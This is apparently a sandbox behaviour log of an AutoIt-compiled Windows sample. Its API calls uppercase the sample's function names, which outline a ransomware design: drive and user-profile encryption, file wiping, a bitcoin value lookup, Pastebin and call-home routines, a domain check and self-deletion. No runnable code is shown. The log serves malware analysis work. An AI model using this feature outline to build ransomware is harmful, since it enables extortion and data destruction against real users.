[0251.376] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75960 [0251.376] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78ae8 | out: hHeap=0xc60000) returned 1 [0251.376] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7e7f0 [0251.376] CharUpperBuffW (in: lpsz="__FO_FILESEARCHTYPE", cchLength=0x13 | out: lpsz="__FO_FILESEARCHTYPE") returned 0x13 [0251.376] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc86548 | out: hHeap=0xc60000) returned 1 [0251.376] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758e0 | out: hHeap=0xc60000) returned 1 [0251.376] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd793a0 | out: hHeap=0xc60000) returned 1 [0251.376] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79388 | out: hHeap=0xc60000) returned 1 [0251.376] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78680 | out: hHeap=0xc60000) returned 1 [0251.376] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd792f8 | out: hHeap=0xc60000) returned 1 [0251.376] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79310 | out: hHeap=0xc60000) returned 1 [0251.376] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79370 | out: hHeap=0xc60000) returned 1 [0251.376] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79358 | out: hHeap=0xc60000) returned 1 [0251.376] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79340 | out: hHeap=0xc60000) returned 1 [0251.376] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc86520 | out: hHeap=0xc60000) returned 1 [0251.376] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7e668 | out: hHeap=0xc60000) returned 1 [0251.376] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758d0 | out: hHeap=0xc60000) returned 1 [0251.376] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7e668 [0251.376] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd758d0 [0251.376] CharUpperBuffW (in: lpsz="__FO_FILESEARCHMASK", cchLength=0x13 | out: lpsz="__FO_FILESEARCHMASK") returned 0x13 [0251.376] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7e668 | out: hHeap=0xc60000) returned 1 [0251.376] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758d0 | out: hHeap=0xc60000) returned 1 [0251.376] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79340 [0251.376] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd758d0 [0251.376] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79358 [0251.376] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd758e0 [0251.377] CharUpperBuffW (in: lpsz="__FO_FILESEARCHMASK", cchLength=0x13 | out: lpsz="__FO_FILESEARCHMASK") returned 0x13 [0251.377] CharUpperBuffW (in: lpsz="__FO_USERLOCALE", cchLength=0xf | out: lpsz="__FO_USERLOCALE") returned 0xf [0251.377] CharUpperBuffW (in: lpsz="__FO_USERLOCALE", cchLength=0xf | out: lpsz="__FO_USERLOCALE") returned 0xf [0251.377] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0251.377] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0251.377] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0251.377] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0251.377] CharUpperBuffW (in: lpsz="_SENDMESSAGE", cchLength=0xc | out: lpsz="_SENDMESSAGE") returned 0xc [0251.377] CharUpperBuffW (in: lpsz="_SENDMESSAGE", cchLength=0xc | out: lpsz="_SENDMESSAGE") returned 0xc [0251.377] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0251.377] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0251.378] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0251.378] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0251.378] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0251.378] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0251.378] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0251.378] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0251.378] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTFILE") returned 0x12 [0251.378] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTFILE") returned 0x12 [0251.378] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTDATA") returned 0x12 [0251.378] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTDATA") returned 0x12 [0251.378] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0251.378] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0251.379] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0251.379] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0251.379] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0251.379] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0251.379] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0251.379] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0251.379] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0251.379] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0251.379] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0251.379] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0251.379] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0251.379] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0251.380] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0251.380] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0251.380] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0251.380] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0251.380] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0251.380] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0251.380] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0251.380] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0251.380] CharUpperBuffW (in: lpsz="START_THE_SHOW", cchLength=0xe | out: lpsz="START_THE_SHOW") returned 0xe [0251.380] CharUpperBuffW (in: lpsz="START_THE_SHOW", cchLength=0xe | out: lpsz="START_THE_SHOW") returned 0xe [0251.380] CharUpperBuffW (in: lpsz="ENCRYPT_DRIVES", cchLength=0xe | out: lpsz="ENCRYPT_DRIVES") returned 0xe [0251.381] CharUpperBuffW (in: lpsz="ENCRYPT_DRIVES", cchLength=0xe | out: lpsz="ENCRYPT_DRIVES") returned 0xe [0251.381] CharUpperBuffW (in: lpsz="DECRYPT_DRIVES", cchLength=0xe | out: lpsz="DECRYPT_DRIVES") returned 0xe [0251.381] CharUpperBuffW (in: lpsz="DECRYPT_DRIVES", cchLength=0xe | out: lpsz="DECRYPT_DRIVES") returned 0xe [0251.381] CharUpperBuffW (in: lpsz="ENCRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="ENCRYPT_USERPROFILES") returned 0x14 [0251.381] CharUpperBuffW (in: lpsz="ENCRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="ENCRYPT_USERPROFILES") returned 0x14 [0251.381] CharUpperBuffW (in: lpsz="DECRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="DECRYPT_USERPROFILES") returned 0x14 [0251.381] CharUpperBuffW (in: lpsz="DECRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="DECRYPT_USERPROFILES") returned 0x14 [0251.381] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0251.381] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0251.381] CharUpperBuffW (in: lpsz="_DECRYPT", cchLength=0x8 | out: lpsz="_DECRYPT") returned 0x8 [0251.381] CharUpperBuffW (in: lpsz="_DECRYPT", cchLength=0x8 | out: lpsz="_DECRYPT") returned 0x8 [0251.381] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0251.382] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0251.382] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0251.382] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0251.382] CharUpperBuffW (in: lpsz="_RUNCMD", cchLength=0x7 | out: lpsz="_RUNCMD") returned 0x7 [0251.382] CharUpperBuffW (in: lpsz="_RUNCMD", cchLength=0x7 | out: lpsz="_RUNCMD") returned 0x7 [0251.382] CharUpperBuffW (in: lpsz="TRUE_HOMEDRIVE", cchLength=0xe | out: lpsz="TRUE_HOMEDRIVE") returned 0xe [0251.382] CharUpperBuffW (in: lpsz="TRUE_HOMEDRIVE", cchLength=0xe | out: lpsz="TRUE_HOMEDRIVE") returned 0xe [0251.382] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.382] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.382] CharUpperBuffW (in: lpsz="RESTARTSCRIPT", cchLength=0xd | out: lpsz="RESTARTSCRIPT") returned 0xd [0251.382] CharUpperBuffW (in: lpsz="RESTARTSCRIPT", cchLength=0xd | out: lpsz="RESTARTSCRIPT") returned 0xd [0251.383] CharUpperBuffW (in: lpsz="_ASH_USERKEY_DETECT", cchLength=0x13 | out: lpsz="_ASH_USERKEY_DETECT") returned 0x13 [0251.383] CharUpperBuffW (in: lpsz="_ASH_USERKEY_DETECT", cchLength=0x13 | out: lpsz="_ASH_USERKEY_DETECT") returned 0x13 [0251.383] CharUpperBuffW (in: lpsz="SUICIDE", cchLength=0x7 | out: lpsz="SUICIDE") returned 0x7 [0251.383] CharUpperBuffW (in: lpsz="SUICIDE", cchLength=0x7 | out: lpsz="SUICIDE") returned 0x7 [0251.383] CharUpperBuffW (in: lpsz="STARTUP", cchLength=0x7 | out: lpsz="STARTUP") returned 0x7 [0251.383] CharUpperBuffW (in: lpsz="STARTUP", cchLength=0x7 | out: lpsz="STARTUP") returned 0x7 [0251.383] CharUpperBuffW (in: lpsz="PASSWORD_GENERATOR", cchLength=0x12 | out: lpsz="PASSWORD_GENERATOR") returned 0x12 [0251.383] CharUpperBuffW (in: lpsz="PASSWORD_GENERATOR", cchLength=0x12 | out: lpsz="PASSWORD_GENERATOR") returned 0x12 [0251.383] CharUpperBuffW (in: lpsz="PASTEBIN", cchLength=0x8 | out: lpsz="PASTEBIN") returned 0x8 [0251.383] CharUpperBuffW (in: lpsz="PASTEBIN", cchLength=0x8 | out: lpsz="PASTEBIN") returned 0x8 [0251.383] CharUpperBuffW (in: lpsz="_GET_BITCOIN_VALUE", cchLength=0x12 | out: lpsz="_GET_BITCOIN_VALUE") returned 0x12 [0251.384] CharUpperBuffW (in: lpsz="_GET_BITCOIN_VALUE", cchLength=0x12 | out: lpsz="_GET_BITCOIN_VALUE") returned 0x12 [0251.384] CharUpperBuffW (in: lpsz="_GUICTRLEDIT_SETLIMITTEXT", cchLength=0x19 | out: lpsz="_GUICTRLEDIT_SETLIMITTEXT") returned 0x19 [0251.384] CharUpperBuffW (in: lpsz="_GUICTRLEDIT_SETLIMITTEXT", cchLength=0x19 | out: lpsz="_GUICTRLEDIT_SETLIMITTEXT") returned 0x19 [0251.384] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0251.384] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0251.384] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0251.384] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0251.384] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEMAPPING", cchLength=0x19 | out: lpsz="_WINAPI_CREATEFILEMAPPING") returned 0x19 [0251.384] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEMAPPING", cchLength=0x19 | out: lpsz="_WINAPI_CREATEFILEMAPPING") returned 0x19 [0251.384] CharUpperBuffW (in: lpsz="_WINAPI_MAPVIEWOFFILE", cchLength=0x15 | out: lpsz="_WINAPI_MAPVIEWOFFILE") returned 0x15 [0251.384] CharUpperBuffW (in: lpsz="_WINAPI_MAPVIEWOFFILE", cchLength=0x15 | out: lpsz="_WINAPI_MAPVIEWOFFILE") returned 0x15 [0251.384] CharUpperBuffW (in: lpsz="_WINAPI_UNMAPVIEWOFFILE", cchLength=0x17 | out: lpsz="_WINAPI_UNMAPVIEWOFFILE") returned 0x17 [0251.385] CharUpperBuffW (in: lpsz="_WINAPI_UNMAPVIEWOFFILE", cchLength=0x17 | out: lpsz="_WINAPI_UNMAPVIEWOFFILE") returned 0x17 [0251.385] CharUpperBuffW (in: lpsz="_SINGLETON", cchLength=0xa | out: lpsz="_SINGLETON") returned 0xa [0251.385] CharUpperBuffW (in: lpsz="_SINGLETON", cchLength=0xa | out: lpsz="_SINGLETON") returned 0xa [0251.385] CharUpperBuffW (in: lpsz="_FILECOUNTLINES", cchLength=0xf | out: lpsz="_FILECOUNTLINES") returned 0xf [0251.385] CharUpperBuffW (in: lpsz="_FILECOUNTLINES", cchLength=0xf | out: lpsz="_FILECOUNTLINES") returned 0xf [0251.385] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0251.385] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0251.385] CharUpperBuffW (in: lpsz="DOMAINCHECK", cchLength=0xb | out: lpsz="DOMAINCHECK") returned 0xb [0251.385] CharUpperBuffW (in: lpsz="DOMAINCHECK", cchLength=0xb | out: lpsz="DOMAINCHECK") returned 0xb [0251.385] CharUpperBuffW (in: lpsz="_WINAPI_NETGETJOININFORMATION", cchLength=0x1d | out: lpsz="_WINAPI_NETGETJOININFORMATION") returned 0x1d [0251.385] CharUpperBuffW (in: lpsz="_WINAPI_NETGETJOININFORMATION", cchLength=0x1d | out: lpsz="_WINAPI_NETGETJOININFORMATION") returned 0x1d [0251.386] CharUpperBuffW (in: lpsz="_BUFFERSIZE", cchLength=0xb | out: lpsz="_BUFFERSIZE") returned 0xb [0251.386] CharUpperBuffW (in: lpsz="_BUFFERSIZE", cchLength=0xb | out: lpsz="_BUFFERSIZE") returned 0xb [0251.386] CharUpperBuffW (in: lpsz="CALLHOME", cchLength=0x8 | out: lpsz="CALLHOME") returned 0x8 [0251.386] CharUpperBuffW (in: lpsz="CALLHOME", cchLength=0x8 | out: lpsz="CALLHOME") returned 0x8 [0251.386] CharUpperBuffW (in: lpsz="MYERRFUNC", cchLength=0x9 | out: lpsz="MYERRFUNC") returned 0x9 [0251.386] CharUpperBuffW (in: lpsz="MYERRFUNC", cchLength=0x9 | out: lpsz="MYERRFUNC") returned 0x9 [0251.386] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0xc854c8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x87fb6c | out: IsMember=0x87fb6c) returned 1 [0251.386] GetSysColorBrush (nIndex=15) returned 0x1100059 [0251.387] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0251.387] LoadIconW (hInstance=0x290000, lpIconName=0x63) returned 0x8016b [0251.387] LoadIconW (hInstance=0x290000, lpIconName=0xa4) returned 0x80161 [0251.388] LoadIconW (hInstance=0x290000, lpIconName=0xa2) returned 0xf0145 [0251.388] LoadImageW (hInst=0x290000, name=0x63, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0x90107 [0251.389] RegisterClassExW (param_1=0x87fb3c) returned 0xc12c [0251.389] GetSysColorBrush (nIndex=15) returned 0x1100059 [0251.389] RegisterClassExW (param_1=0x87fae0) returned 0xc12b [0251.389] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc0c2 [0251.389] InitCommonControlsEx (picce=0x87fb10) returned 1 [0251.390] ImageList_Create (cx=16, cy=16, flags=0x21, cInitial=1, cGrow=1) returned 0xc9cbd0 [0251.390] LoadIconW (hInstance=0x290000, lpIconName=0xa9) returned 0x50179 [0251.391] ImageList_ReplaceIcon (himl=0xc9cbd0, i=-1, hicon=0x50179) returned 0 [0251.392] CreateWindowExW (dwExStyle=0x0, lpClassName="AutoIt v3", lpWindowName="AutoIt v3", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=300, nHeight=100, hWndParent=0x0, hMenu=0x0, hInstance=0x290000, lpParam=0x0) returned 0x30172 [0251.392] NtdllDefWindowProc_W () returned 0x0 [0251.392] NtdllDefWindowProc_W () returned 0x1 [0251.395] NtdllDefWindowProc_W () returned 0x0 [0251.399] SetTimer (hWnd=0x30172, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0251.399] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc0c2 [0251.399] CreatePopupMenu () returned 0x1c013b [0251.399] CreateWindowExW (dwExStyle=0x0, lpClassName="edit", lpWindowName=0x0, dwStyle=0x50b008c4, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x30172, hMenu=0x1, hInstance=0x290000, lpParam=0x0) returned 0x3014c [0251.412] NtdllDefWindowProc_W () returned 0x0 [0251.412] ShowWindow (hWnd=0x30172, nCmdShow=0) returned 0 [0251.412] ShowWindow (hWnd=0x30172, nCmdShow=0) returned 0 [0251.412] Shell_NotifyIconW (dwMessage=0x0, lpData=0x87f7b8) returned 1 [0251.439] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xc9d660 [0251.439] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75cf0 [0251.439] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87f3e8) returned 1 [0251.439] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9d660 | out: hHeap=0xc60000) returned 1 [0251.439] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75cf0 | out: hHeap=0xc60000) returned 1 [0251.439] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.440] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.440] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75cf0 [0251.440] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69c70 [0251.440] CharUpperBuffW (in: lpsz="_FO_FILESEARCH", cchLength=0xe | out: lpsz="_FO_FILESEARCH") returned 0xe [0251.440] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69c70 | out: hHeap=0xc60000) returned 1 [0251.440] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75cf0 | out: hHeap=0xc60000) returned 1 [0251.440] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.440] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75cf0 [0251.440] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ee10 [0251.440] CharUpperBuffW (in: lpsz="_FO_FOLDERSEARCH", cchLength=0x10 | out: lpsz="_FO_FOLDERSEARCH") returned 0x10 [0251.440] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7ee10 | out: hHeap=0xc60000) returned 1 [0251.440] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75cf0 | out: hHeap=0xc60000) returned 1 [0251.440] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.440] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75cf0 [0251.440] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ee10 [0251.440] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCHMASK", cchLength=0x15 | out: lpsz="__FO_FOLDERSEARCHMASK") returned 0x15 [0251.440] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7ee10 | out: hHeap=0xc60000) returned 1 [0251.440] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75cf0 | out: hHeap=0xc60000) returned 1 [0251.440] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.440] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75cf0 [0251.440] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ee10 [0251.440] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCH", cchLength=0x11 | out: lpsz="__FO_FOLDERSEARCH") returned 0x11 [0251.440] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7ee10 | out: hHeap=0xc60000) returned 1 [0251.440] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75cf0 | out: hHeap=0xc60000) returned 1 [0251.440] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.440] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75cf0 [0251.440] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ee10 [0251.441] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0251.441] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7ee10 | out: hHeap=0xc60000) returned 1 [0251.441] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75cf0 | out: hHeap=0xc60000) returned 1 [0251.441] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.441] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75cf0 [0251.441] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ee10 [0251.441] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0251.441] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7ee10 | out: hHeap=0xc60000) returned 1 [0251.441] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75cf0 | out: hHeap=0xc60000) returned 1 [0251.441] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.441] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75cf0 [0251.441] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ee10 [0251.441] CharUpperBuffW (in: lpsz="__FO_GETLISTMASK", cchLength=0x10 | out: lpsz="__FO_GETLISTMASK") returned 0x10 [0251.441] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7ee10 | out: hHeap=0xc60000) returned 1 [0251.441] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75cf0 | out: hHeap=0xc60000) returned 1 [0251.441] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.441] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75cf0 [0251.441] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ee10 [0251.441] CharUpperBuffW (in: lpsz="__FO_FILESEARCHTYPE", cchLength=0x13 | out: lpsz="__FO_FILESEARCHTYPE") returned 0x13 [0251.441] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7ee10 | out: hHeap=0xc60000) returned 1 [0251.441] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75cf0 | out: hHeap=0xc60000) returned 1 [0251.441] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 